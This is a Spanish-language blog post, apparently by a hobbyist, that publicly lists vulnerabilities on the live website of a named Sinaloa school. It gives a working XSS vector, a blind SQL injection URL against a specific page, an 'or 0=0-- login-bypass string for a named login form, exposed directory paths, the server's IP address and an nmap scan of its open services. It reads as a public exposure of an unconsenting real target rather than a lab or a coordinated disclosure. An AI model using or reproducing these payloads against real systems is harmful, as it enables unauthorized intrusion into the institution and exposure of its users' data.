Bueno amigos este dia me puse al pedo para traer un par de vulnerabilidades ya que no he estado escribiendo ultimamente y pues ahora que tengo tiempo he de escribir este articulo de un par de vulnerabilidades en conalepsin un portal de aca de sinaloa donde es un centro de estudio siendo asi no deberia haber tantas vulnerabilidades xD....
empecemos por cross site scripting:
Vector: <ScRiPt >prompt(930295)</ScRiPt>
Iss directory enumeration
http://conalepsin.edu.mx/cms/
muestra los nombres de todos los planteles
Pagina de configuracion
hubiera sido bueno si mostrara las configuraciones, parece ser que es cuando creas una pagina con frontpage :P
http://conalepsin.edu.mx/_vti_inf.html
Un CSRF que no sirve mas que para buscar xD
http://conalepsin.edu.mx/cms/content.asp?company=0&proc=search&procid=hi
Permite diferentes metodos en las cabeceras
OPTIONS, TRACE, GET, HEAD
se salvo de un method put xD
Ohhh pero que es esto? alguien ya estuvo aqui :O
http://conalepsin.edu.mx/cms/database/
http://conalepsin.edu.mx/cms/upload/
http://conalepsin.edu.mx/cms/images/
http://conalepsin.edu.mx/cms/scripts/
http://conalepsin.edu.mx/cms/editor/
muestrame los robots :D
http://conalepsin.edu.mx/robots.txt
y por ultimo tenemos una bonita bsqli
http://conalepsin.edu.mx/cms/content.asp?company=0&proc=news&procid=1' or '38'='39
encontre un par de tablas y columnas nada importantes xD
Bypass Login
http://conalepsin.edu.mx/apps/chekt/Default.aspx
'or 0=0--
Informacion sobre el servidor:
Microsoft-IIS/6.0
Windows
[ASP.NET]
IP: 201.134.74.35
Base de datos:MSAccess
contiene archivos: asp,swf,js,txt
Footprinting:
PORT STATE SERVICE VERSION
21/tcp open ftp
25/tcp filtered smtp
53/tcp open domain Mikrotik RouterOS named or OpenDNS Updater
80/tcp open http Microsoft IIS httpd 6.0
110/tcp open pop3 Merak Mail server pop3d 8.0.3
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.766; SP3a
1723/tcp open pptp?
2000/tcp open bandwidth-test Mikrotik bandwidth-test server
3128/tcp filtered squid-http
3389/tcp open ms-wbt-server Microsoft Terminal Service
5190/tcp filtered aol
8291/tcp open unknown
9999/tcp open abyss?
No hay comentarios:
Publicar un comentario